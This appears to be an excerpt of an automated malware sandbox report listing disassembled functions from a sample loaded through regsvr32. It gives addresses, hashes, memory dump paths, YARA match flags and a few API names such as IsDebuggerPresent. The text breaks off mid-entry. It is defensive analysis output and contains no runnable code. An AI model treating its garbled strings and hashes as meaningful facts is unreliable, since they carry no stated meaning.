                                                                      • Opcode ID: 943c7c2c61714b72029a8fd813d6c42c5c92d180aed6d879ae2838ea4b2e708e
                                                                      • Instruction ID: 5ab913ef515fd25bf7fc04ce61f78e9cde1e7d2fd73709943c0f3a5cbb59c84a
                                                                      • Opcode Fuzzy Hash: 943c7c2c61714b72029a8fd813d6c42c5c92d180aed6d879ae2838ea4b2e708e
                                                                      • Instruction Fuzzy Hash: 1D612B7010978C8BDBF8CF54DC997EA3BA6FB54345F208519E84E8A270DB74968CCB42
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0000000180023831 Relevance: 3.9, Strings: 3, Instructions: 108COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: )K$U|$|1-
                                                                      • API String ID: 0-2543966960
                                                                      • Opcode ID: 5f28dff232c1c58b23d465856644a80aed22efa063cacd8378c131e5813de89a
                                                                      • Instruction ID: 8eb6a9a016547b1518e90ac2546dd564535e4ecbba9ac8d240a0a1c3e9042cf5
                                                                      • Opcode Fuzzy Hash: 5f28dff232c1c58b23d465856644a80aed22efa063cacd8378c131e5813de89a
                                                                      • Instruction Fuzzy Hash: 1151D57160438CAFDBF6CE64D8857CA37A0AB06354F608129A89D8A291DBB4578DCB02
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0000000180029368 Relevance: 3.9, Strings: 3, Instructions: 105COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 6|$6`d$H~z
                                                                      • API String ID: 0-1702722476
                                                                      • Opcode ID: 6487df39d46446a395b722702bbc9accbfbbf10f6bdf8a05bf21e92dd4d708c3
                                                                      • Instruction ID: dff368548e7284a50638b46c1e9eca52edd1bdea535486c94ebb7356abcac70e
                                                                      • Opcode Fuzzy Hash: 6487df39d46446a395b722702bbc9accbfbbf10f6bdf8a05bf21e92dd4d708c3
                                                                      • Instruction Fuzzy Hash: C351F37190074DDFCF48DFA4D98A5DEBBB0FB48308F118659E89AA7260C7B89A44CF45
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0000000180019618 Relevance: 3.8, Strings: 3, Instructions: 92COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: d~$`5$t>
                                                                      • API String ID: 0-1282322184
                                                                      • Opcode ID: 5ab2e5105061d0cdd7dd2083328b31dc67734e2d6c9a8d2650bd0306db7847c6
                                                                      • Instruction ID: 2b9aad7a7c3990d0f54026c4e2bc5a00c5a3c031faa8fbf8ed0394cc09118e70
                                                                      • Opcode Fuzzy Hash: 5ab2e5105061d0cdd7dd2083328b31dc67734e2d6c9a8d2650bd0306db7847c6
                                                                      • Instruction Fuzzy Hash: 9141B2B190078ECBCF48DFA8C88A1DE7BB0FB58358F104A19E965A6250D3B49664CF84
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 000000018000BB28 Relevance: 3.8, Strings: 3, Instructions: 91COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: #St$JYr$hmn
                                                                      • API String ID: 0-1556749129
                                                                      • Opcode ID: 8c5881788024da3e2945e5a9e10c631b66cff36ab1256063138a18bf82cfdc40
                                                                      • Instruction ID: 771f7f328e054501a5ac5c786693eba7885e85f29817745d48b7f08549072e32
                                                                      • Opcode Fuzzy Hash: 8c5881788024da3e2945e5a9e10c631b66cff36ab1256063138a18bf82cfdc40
                                                                      • Instruction Fuzzy Hash: 9141A2B590038E8FCF48CF68C9865DF7BB0FB58358F104A19E866A6250D3B8D665CF85
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0000000180002610 Relevance: 3.8, Strings: 3, Instructions: 87COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: TGA$K$W}
                                                                      • API String ID: 0-588348707
                                                                      • Opcode ID: 6f9a2f9587d8e5dd3523940eb2aee6104e1c9ad2b61c16d7289d24ecd03a1c44
                                                                      • Instruction ID: 925d7415f36b0b7642ffd9188936a5d9ffa2c4cac62ef92b2c466baf2dc1674c
                                                                      • Opcode Fuzzy Hash: 6f9a2f9587d8e5dd3523940eb2aee6104e1c9ad2b61c16d7289d24ecd03a1c44
                                                                      • Instruction Fuzzy Hash: E041C2B480038E8FCB88DF68D8865DE7BB0FB58358F10461DF82AA6254D3B49664CF95
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 000000018000738C Relevance: 3.8, Strings: 3, Instructions: 86COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: :1,$@H${C=
                                                                      • API String ID: 0-2737386091
                                                                      • Opcode ID: 644fe5c2a8aa80c3bc0818b82038798635fbfb77325ece216352586eb067b324
                                                                      • Instruction ID: ceb57f34bb3f34c1ea772447f295c080a735f780389ac7edd693abfe49cb3e58
                                                                      • Opcode Fuzzy Hash: 644fe5c2a8aa80c3bc0818b82038798635fbfb77325ece216352586eb067b324
                                                                      • Instruction Fuzzy Hash: B641E6B090078E8FCF48DF68C98A5DE7BB0FB58348F104A1DE856A6250D3B4D665CF95
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 000000018001481C Relevance: 3.8, Strings: 3, Instructions: 74COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: prP$q<C$uL
                                                                      • API String ID: 0-1414207395
                                                                      • Opcode ID: 2ae9b2111e30b1203ae6799d8d29bbb45b968934521661f86bb08c7d67e7e9b2
                                                                      • Instruction ID: cc3a3a13117e67edb5dc9e3fadb8c1066889dae633948d8cd9104a976a047d4b
                                                                      • Opcode Fuzzy Hash: 2ae9b2111e30b1203ae6799d8d29bbb45b968934521661f86bb08c7d67e7e9b2
                                                                      • Instruction Fuzzy Hash: 1031B1B180434E9FCB48DF68C88A5DE7FB0FB58358F10961DE85AA6260D3789695CFC4
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0000000180006458 Relevance: 3.8, Strings: 3, Instructions: 61COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: :00D$Kl$(R'
                                                                      • API String ID: 0-3661897330
                                                                      • Opcode ID: 85d3200e76e47dbb67993755bb0ce797b19f94abe7489bd39968e35e8c3a1c76
                                                                      • Instruction ID: 113703a4c5f13be184801d5493027e38acd6d1afb500234bb699672912ccf9eb
                                                                      • Opcode Fuzzy Hash: 85d3200e76e47dbb67993755bb0ce797b19f94abe7489bd39968e35e8c3a1c76
                                                                      • Instruction Fuzzy Hash: CA216F74618B848BD74CDF28C46551EBBE1BB8C718F440B1DF4CAAA354D778D6058B4A
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FFA526A5944 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 154COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • _getptd.LIBCMT ref: 00007FFA526A597E
                                                                        • Part of subcall function 00007FFA526A6550: RtlCaptureContext.KERNEL32 ref: 00007FFA526A658F
                                                                        • Part of subcall function 00007FFA526A6550: IsDebuggerPresent.KERNEL32 ref: 00007FFA526A662D
                                                                        • Part of subcall function 00007FFA526A6550: SetUnhandledExceptionFilter.KERNEL32 ref: 00007FFA526A6637
                                                                        • Part of subcall function 00007FFA526A6550: UnhandledExceptionFilter.KERNEL32 ref: 00007FFA526A6642
                                                                        • Part of subcall function 00007FFA526A6550: GetCurrentProcess.KERNEL32 ref: 00007FFA526A6658
                                                                        • Part of subcall function 00007FFA526A6550: TerminateProcess.KERNEL32 ref: 00007FFA526A6666
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445515681.00007FFA52661000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFA52660000, based on PE: true
                                                                      • Associated: 00000003.00000002.445501406.00007FFA52660000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.446510295.00007FFA526B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.446607192.00007FFA526B6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.446616160.00007FFA526B9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_7ffa52660000_regsvr32.jbxd
                                                                      Similarity
                                                                      • API ID: ExceptionFilterProcessUnhandled$CaptureContextCurrentDebuggerPresentTerminate_errno_getptd
                                                                      • String ID: C
                                                                      • API String ID: 1583075380-1037565863
                                                                      • Opcode ID: 10b8f8e64b2f2c6b57eebdc268e2529a4342badfac4ad9c6369cf06c32040822
                                                                      • Instruction ID: 131493ad0b0fa91b386578bd89b44f5d94a144b1755a46de2974253967e6ad1d
                                                                      • Opcode Fuzzy Hash: 10b8f8e64b2f2c6b57eebdc268e2529a4342badfac4ad9c6369cf06c32040822
                                                                      • Instruction Fuzzy Hash: 1E516252F1968281EA60DB22AD617BA56D0FB86B84F4CC031EE4E47E8DDFBDE045D700
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FFA526AC6E4 Relevance: 3.1, APIs: 2, Instructions: 64COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445515681.00007FFA52661000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFA52660000, based on PE: true
                                                                      • Associated: 00000003.00000002.445501406.00007FFA52660000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.446510295.00007FFA526B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.446607192.00007FFA526B6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.446616160.00007FFA526B9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_7ffa52660000_regsvr32.jbxd
                                                                      Similarity
                                                                      • API ID: InfoLocale_getptd
                                                                      • String ID:
                                                                      • API String ID: 3731964398-0
                                                                      • Opcode ID: 3ee99f9ceacccca0b475531418f3f0bad8631950249c9606f8709888dfed1ca9
                                                                      • Instruction ID: 8cb64079d0ced8664367daa7a599203c12a45dbd6fd590c8603d6837030bcc39
                                                                      • Opcode Fuzzy Hash: 3ee99f9ceacccca0b475531418f3f0bad8631950249c9606f8709888dfed1ca9
                                                                      • Instruction Fuzzy Hash: 60218733B08682C6EB689B25DD553EA73E0FB8A745F088131C65D87A89DFBCE4649600
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FFA526AC2B4 Relevance: 3.1, APIs: 2, Instructions: 56COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445515681.00007FFA52661000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFA52660000, based on PE: true
                                                                      • Associated: 00000003.00000002.445501406.00007FFA52660000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.446510295.00007FFA526B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.446607192.00007FFA526B6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.446616160.00007FFA526B9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_7ffa52660000_regsvr32.jbxd
                                                                      Similarity
                                                                      • API ID: InfoLocale_getptd
                                                                      • String ID:
                                                                      • API String ID: 3731964398-0
                                                                      • Opcode ID: d1cd7d40a2314de2c6ade98052514a7069188fc7bc8d66beba22a864349849c0
                                                                      • Instruction ID: 21c6dabd50465675e2da0ff3d008abc21d50858ffec39cd86ccca986fd8d347a
                                                                      • Opcode Fuzzy Hash: d1cd7d40a2314de2c6ade98052514a7069188fc7bc8d66beba22a864349849c0
                                                                      • Instruction Fuzzy Hash: B9217F32B08681D6DB28CB65D8553AA73E0FB8AB80F488135DA5D87B58CF7CE554C740
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00000001800264F0 Relevance: 2.8, Strings: 2, Instructions: 299COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: $$Y}
                                                                      • API String ID: 0-941771097
                                                                      • Opcode ID: ccf5b1dce74faba3fe2a090267a66303c79afc7ef0f7a8852e8ee526979540e5
                                                                      • Instruction ID: b5fbb9b8d69d65623167db00d7c984f611664f17b2ba8ffe1295fa2c65075a94
                                                                      • Opcode Fuzzy Hash: ccf5b1dce74faba3fe2a090267a66303c79afc7ef0f7a8852e8ee526979540e5
                                                                      • Instruction Fuzzy Hash: BFD11771D0475C8BDBA9CFA4C58A6DDBBB0FF48304F14812ED406AA664DBB4A94ACF41
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0000000180018148 Relevance: 2.8, Strings: 2, Instructions: 273COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 7;}~$?C
                                                                      • API String ID: 0-2633536567
                                                                      • Opcode ID: 9e9477893eee9c26855422b11b358c2b9c7e89ea64d6e27a9c9a45e4b3e49bc9
                                                                      • Instruction ID: 4ff8dde17651611a765cac66b1fbb421dc2d9ab68fb3aea537ff971927bbf4a2
                                                                      • Opcode Fuzzy Hash: 9e9477893eee9c26855422b11b358c2b9c7e89ea64d6e27a9c9a45e4b3e49bc9
                                                                      • Instruction Fuzzy Hash: 78D1157090074CEBCB98DF28C8CA6DD7FA0FF443A4FA06119FA5696250D7719989CB81
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0000000180025DAC Relevance: 2.8, Strings: 2, Instructions: 272COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 5"*$Wu
                                                                      • API String ID: 0-3407213400
                                                                      • Opcode ID: 590a19696181e1204ae7455af11f8a1d001dcd1a3fed74675f5c17178e0ac61d
                                                                      • Instruction ID: 3c96fdf1381a0958c8520d7d71fe6f2c88625533ee613de06fa48a87f48c4e54
                                                                      • Opcode Fuzzy Hash: 590a19696181e1204ae7455af11f8a1d001dcd1a3fed74675f5c17178e0ac61d
                                                                      • Instruction Fuzzy Hash: C5D1347150160CDBCBA9DF38C0896D93BE1FF68314F606229FC26962A6C770D998CB45
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0000000180026B10 Relevance: 2.8, Strings: 2, Instructions: 257COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: F/|$]M
                                                                      • API String ID: 0-4182351379
                                                                      • Opcode ID: 43b00b6be08a8afbf3f5eb28955fc8fd0982218358cdb9bdb13e45d672a344d5
                                                                      • Instruction ID: a7a3ffa63f459c2793369717af269d13be5e973408dad35b7fec4159c22d1286
                                                                      • Opcode Fuzzy Hash: 43b00b6be08a8afbf3f5eb28955fc8fd0982218358cdb9bdb13e45d672a344d5
                                                                      • Instruction Fuzzy Hash: 93C1FC7590574CCFDBAACF28C4896DA3BE4FF18348F104129FC1A96262C778E959CB46
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0000000180021C3C Relevance: 2.7, Strings: 2, Instructions: 216COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: ;SH$nK
                                                                      • API String ID: 0-1681473137
                                                                      • Opcode ID: 60009ad1e2a9263792ce168a39eeae7aea84bb316664056338e5cad3c2547986
                                                                      • Instruction ID: 2d779165796623b26e7721dc1da123eca1e5f2af18f65828867eec0b4a65172d
                                                                      • Opcode Fuzzy Hash: 60009ad1e2a9263792ce168a39eeae7aea84bb316664056338e5cad3c2547986
                                                                      • Instruction Fuzzy Hash: A4A1F6B1D047188FDB69DFA9C8896DDBBF0FB58308F20821DE456AB252DB70A945CF40
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00000001800014F8 Relevance: 2.7, Strings: 2, Instructions: 185COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: ,$z
                                                                      • API String ID: 0-3532108746
                                                                      • Opcode ID: dc10c8488ddee61f5c5f049ba36fdd234a8a1d33d2b4922d6dc47400662f32e6
                                                                      • Instruction ID: 22c424daf7001e4089cf159549a6bd5e686fa177ee3286ce9bb9aa7af20863be
                                                                      • Opcode Fuzzy Hash: dc10c8488ddee61f5c5f049ba36fdd234a8a1d33d2b4922d6dc47400662f32e6
                                                                      • Instruction Fuzzy Hash: D8813B7050064ECFDB99CF28C8967DE3BA0FB58388F214219FC469A251D778DA99CBC5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 000000018001A460 Relevance: 2.7, Strings: 2, Instructions: 182COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: g/?$~l;
                                                                      • API String ID: 0-1448562259
                                                                      • Opcode ID: c1035f7af6a4496562a9c3e7f8bb9bdabded1ee22b21e9d05eb711cf1176ed3d
                                                                      • Instruction ID: 3fbc9289fec6fa85948f8c66d04cee19a314a674a1b98c47510047b5f8856774
                                                                      • Opcode Fuzzy Hash: c1035f7af6a4496562a9c3e7f8bb9bdabded1ee22b21e9d05eb711cf1176ed3d
                                                                      • Instruction Fuzzy Hash: BD912570D0871C8BDF98CFA8D4896DEBBF0FB48314F108119E815B6261D7788A49CF69
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 000000018000F128 Relevance: 2.7, Strings: 2, Instructions: 173COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: JM$S
                                                                      • API String ID: 0-422059844
                                                                      • Opcode ID: 17c06aff4c9a8785a284e06d6c25610082a70a687229394e7dafcb554760f06a
                                                                      • Instruction ID: 18b4f90d7ab76b898621194cab333307634bf3b6742180ea4845374ffda8c285
                                                                      • Opcode Fuzzy Hash: 17c06aff4c9a8785a284e06d6c25610082a70a687229394e7dafcb554760f06a
                                                                      • Instruction Fuzzy Hash: 58813B715047888BDBB8DF34C8863D93BE1FB54348F60821DEC9ACA262DB74954ADB81
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 000000018000671C Relevance: 2.7, Strings: 2, Instructions: 169COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: \4t$sT>
                                                                      • API String ID: 0-514966222
                                                                      • Opcode ID: bb5024ce5ec3974a1f347232039341d65ca55b368bc4e02a847ae3966b55dd21
                                                                      • Instruction ID: befa5a9d8a747e28c49f4c6f85c9bef8e8333281f143cc702ee02b151a4c5a7a
                                                                      • Opcode Fuzzy Hash: bb5024ce5ec3974a1f347232039341d65ca55b368bc4e02a847ae3966b55dd21
                                                                      • Instruction Fuzzy Hash: 689178B550070DCFDB98CF28C18A59E3BE8FB49318F40412AFC1E9A264E7B4E519CB46
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00000001800075D4 Relevance: 2.7, Strings: 2, Instructions: 155COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 6 zT$lh
                                                                      • API String ID: 0-3667112246
                                                                      • Opcode ID: 3243651aebf4cc17f9c3ac19081b739ce8b4ee13b4845d7785784d3dcbf37647
                                                                      • Instruction ID: 045a3dc0dd112cd33074149f38d13d5bd37ef25ad135160f9863638738ef0602
                                                                      • Opcode Fuzzy Hash: 3243651aebf4cc17f9c3ac19081b739ce8b4ee13b4845d7785784d3dcbf37647
                                                                      • Instruction Fuzzy Hash: 27811A7050478C8FDBBADF64C8AA7CA7BB0FB59304F504219EA4D8A261DB749749CB42
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00000001800248A8 Relevance: 2.6, Strings: 2, Instructions: 143COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 2Q'$t<p
                                                                      • API String ID: 0-2959822804
                                                                      • Opcode ID: 3a858c916c0ce97b4f34a75536e8983d6f889f87815844e5a642c7b43e21a109
                                                                      • Instruction ID: a41fe1ae69e2ef788ca0c35fa62602b5835247be5e9f8fb85ac316e89f41683a
                                                                      • Opcode Fuzzy Hash: 3a858c916c0ce97b4f34a75536e8983d6f889f87815844e5a642c7b43e21a109
                                                                      • Instruction Fuzzy Hash: 30612671D0074E8BDF99DFA9C44A6EEBBB0FB58344F208119E415B7250CB788A49CF92
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0000000180012F28 Relevance: 2.6, Strings: 2, Instructions: 136COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 95s$\`s
                                                                      • API String ID: 0-3495284040
                                                                      • Opcode ID: 588b54260dd6ab6c7a0d8fdad9ba33054619fea491f2d0c2f65b47850ec72611
                                                                      • Instruction ID: 5af2ad2f129eee824c5b1b43ddda8a3f0e9306f12771263eefccbe9bdf0da5be
                                                                      • Opcode Fuzzy Hash: 588b54260dd6ab6c7a0d8fdad9ba33054619fea491f2d0c2f65b47850ec72611
                                                                      • Instruction Fuzzy Hash: 1351D47011478A8BCB48DF28C896ADE3FA1FB58348F114618FC668B264C7B4E665CBC5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 000000018001AAB8 Relevance: 2.6, Strings: 2, Instructions: 131COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 3*$qMu
                                                                      • API String ID: 0-4093015089
                                                                      • Opcode ID: 99b9b50685954fc4be39463e85dd78448f0e0771904def200121889666665086
                                                                      • Instruction ID: 306475205ddf6f42a3ecfe0a1797163739854d195c0d735865f936de0d0f8307
                                                                      • Opcode Fuzzy Hash: 99b9b50685954fc4be39463e85dd78448f0e0771904def200121889666665086
                                                                      • Instruction Fuzzy Hash: 445122B09147189BCB88CFA8E4CA9CDBBF1FF48354F609119F806A7255DB709984CF95
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 000000018002C904 Relevance: 2.6, Strings: 2, Instructions: 112COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
